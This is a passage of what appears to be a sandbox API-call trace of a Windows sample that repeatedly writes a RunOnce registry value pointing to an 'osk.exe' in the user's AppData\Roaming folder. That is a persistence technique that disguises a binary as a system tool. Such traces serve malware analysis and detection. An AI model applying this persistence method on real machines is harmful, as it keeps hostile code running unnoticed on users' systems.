[0108.990] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.003] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.003] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.003] KillTimer (hWnd=0x20280, uIDEvent=0x2449) returned 1 [0109.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.004] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.004] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.004] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.004] RegCloseKey (hKey=0x280) returned 0x0 [0109.004] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.004] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.004] SetTimer (hWnd=0x20280, nIDEvent=0x244a, uElapse=0xa, lpTimerFunc=0x0) returned 0x244a [0109.005] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.019] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.019] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.019] KillTimer (hWnd=0x20280, uIDEvent=0x244a) returned 1 [0109.019] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.019] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.020] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.020] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.020] RegCloseKey (hKey=0x280) returned 0x0 [0109.020] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.020] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.020] SetTimer (hWnd=0x20280, nIDEvent=0x244b, uElapse=0xa, lpTimerFunc=0x0) returned 0x244b [0109.020] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.034] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.034] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.035] KillTimer (hWnd=0x20280, uIDEvent=0x244b) returned 1 [0109.035] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.035] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.035] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.035] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.036] RegCloseKey (hKey=0x280) returned 0x0 [0109.036] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.036] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.036] SetTimer (hWnd=0x20280, nIDEvent=0x244c, uElapse=0xa, lpTimerFunc=0x0) returned 0x244c [0109.036] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0109.050] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.050] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.050] KillTimer (hWnd=0x20280, uIDEvent=0x244c) returned 1 [0109.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.051] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.051] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.051] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.051] RegCloseKey (hKey=0x280) returned 0x0 [0109.051] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.051] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.051] SetTimer (hWnd=0x20280, nIDEvent=0x244d, uElapse=0xa, lpTimerFunc=0x0) returned 0x244d [0109.051] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.067] KillTimer (hWnd=0x20280, uIDEvent=0x244d) returned 1 [0109.068] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.068] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.068] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.070] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.070] RegCloseKey (hKey=0x280) returned 0x0 [0109.070] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.070] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.071] SetTimer (hWnd=0x20280, nIDEvent=0x244e, uElapse=0xa, lpTimerFunc=0x0) returned 0x244e [0109.071] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.081] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.081] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.081] KillTimer (hWnd=0x20280, uIDEvent=0x244e) returned 1 [0109.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.082] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.082] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.082] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.082] RegCloseKey (hKey=0x280) returned 0x0 [0109.082] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.082] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.082] SetTimer (hWnd=0x20280, nIDEvent=0x244f, uElapse=0xa, lpTimerFunc=0x0) returned 0x244f [0109.082] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.097] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.097] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.097] KillTimer (hWnd=0x20280, uIDEvent=0x244f) returned 1 [0109.097] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.097] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.097] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.098] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.098] RegCloseKey (hKey=0x280) returned 0x0 [0109.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.098] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.098] SetTimer (hWnd=0x20280, nIDEvent=0x2450, uElapse=0xa, lpTimerFunc=0x0) returned 0x2450 [0109.098] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.112] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.112] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.113] KillTimer (hWnd=0x20280, uIDEvent=0x2450) returned 1 [0109.113] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.113] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.113] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.113] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.114] RegCloseKey (hKey=0x280) returned 0x0 [0109.114] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.114] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.114] SetTimer (hWnd=0x20280, nIDEvent=0x2451, uElapse=0xa, lpTimerFunc=0x0) returned 0x2451 [0109.114] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.128] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.128] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.128] KillTimer (hWnd=0x20280, uIDEvent=0x2451) returned 1 [0109.129] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.129] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.129] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.129] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.129] RegCloseKey (hKey=0x280) returned 0x0 [0109.129] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.130] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.130] SetTimer (hWnd=0x20280, nIDEvent=0x2452, uElapse=0xa, lpTimerFunc=0x0) returned 0x2452 [0109.130] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.148] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.149] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.149] KillTimer (hWnd=0x20280, 
uIDEvent=0x2452) returned 1 [0109.149] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.149] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.150] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.150] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.150] RegCloseKey (hKey=0x280) returned 0x0 [0109.150] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.150] SetTimer (hWnd=0x20280, nIDEvent=0x2453, uElapse=0xa, lpTimerFunc=0x0) returned 0x2453 [0109.150] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.160] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.160] KillTimer (hWnd=0x20280, uIDEvent=0x2453) returned 1 [0109.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.161] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.161] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.161] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.162] RegCloseKey (hKey=0x280) returned 0x0 [0109.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.162] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.162] SetTimer (hWnd=0x20280, nIDEvent=0x2454, uElapse=0xa, lpTimerFunc=0x0) returned 0x2454 [0109.162] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.175] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.175] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.175] KillTimer (hWnd=0x20280, uIDEvent=0x2454) returned 1 [0109.176] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.176] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.176] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.176] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.176] RegCloseKey (hKey=0x280) returned 0x0 [0109.177] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.177] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.177] SetTimer (hWnd=0x20280, nIDEvent=0x2455, uElapse=0xa, lpTimerFunc=0x0) returned 0x2455 [0109.177] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.190] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.190] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.190] KillTimer (hWnd=0x20280, uIDEvent=0x2455) returned 1 [0109.191] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0109.191] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.191] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.191] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.192] RegCloseKey (hKey=0x280) returned 0x0 [0109.192] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.192] SetTimer (hWnd=0x20280, nIDEvent=0x2456, uElapse=0xa, lpTimerFunc=0x0) returned 0x2456 [0109.192] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.206] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.206] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.206] KillTimer (hWnd=0x20280, uIDEvent=0x2456) returned 1 [0109.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.207] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.207] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.207] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.207] RegCloseKey (hKey=0x280) returned 0x0 
[0109.207] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.207] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.207] SetTimer (hWnd=0x20280, nIDEvent=0x2457, uElapse=0xa, lpTimerFunc=0x0) returned 0x2457 [0109.207] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.221] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.222] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.222] KillTimer (hWnd=0x20280, uIDEvent=0x2457) returned 1 [0109.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.222] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.222] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.223] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.223] RegCloseKey (hKey=0x280) returned 0x0 [0109.223] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.223] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.223] SetTimer (hWnd=0x20280, nIDEvent=0x2458, uElapse=0xa, lpTimerFunc=0x0) returned 0x2458 [0109.223] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.237] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.237] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.237] KillTimer (hWnd=0x20280, uIDEvent=0x2458) returned 1 [0109.238] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.238] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.238] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.238] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.239] RegCloseKey (hKey=0x280) returned 0x0 [0109.239] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.239] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.239] SetTimer (hWnd=0x20280, nIDEvent=0x2459, uElapse=0xa, lpTimerFunc=0x0) returned 0x2459 [0109.239] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.253] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.254] KillTimer (hWnd=0x20280, uIDEvent=0x2459) returned 1 [0109.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.254] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.255] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.255] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.255] RegCloseKey (hKey=0x280) returned 0x0 [0109.255] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.255] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.255] SetTimer (hWnd=0x20280, nIDEvent=0x245a, uElapse=0xa, lpTimerFunc=0x0) returned 0x245a [0109.255] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.305] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.305] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.305] KillTimer (hWnd=0x20280, uIDEvent=0x245a) returned 1 [0109.305] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.306] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.306] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.306] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.306] RegCloseKey (hKey=0x280) returned 0x0 [0109.306] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.306] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.306] SetTimer (hWnd=0x20280, nIDEvent=0x245b, uElapse=0xa, lpTimerFunc=0x0) returned 0x245b [0109.307] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.316] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.316] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.316] KillTimer (hWnd=0x20280, uIDEvent=0x245b) returned 1 [0109.316] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.317] RegCreateKeyExA (in: hKey=0x80000001, 
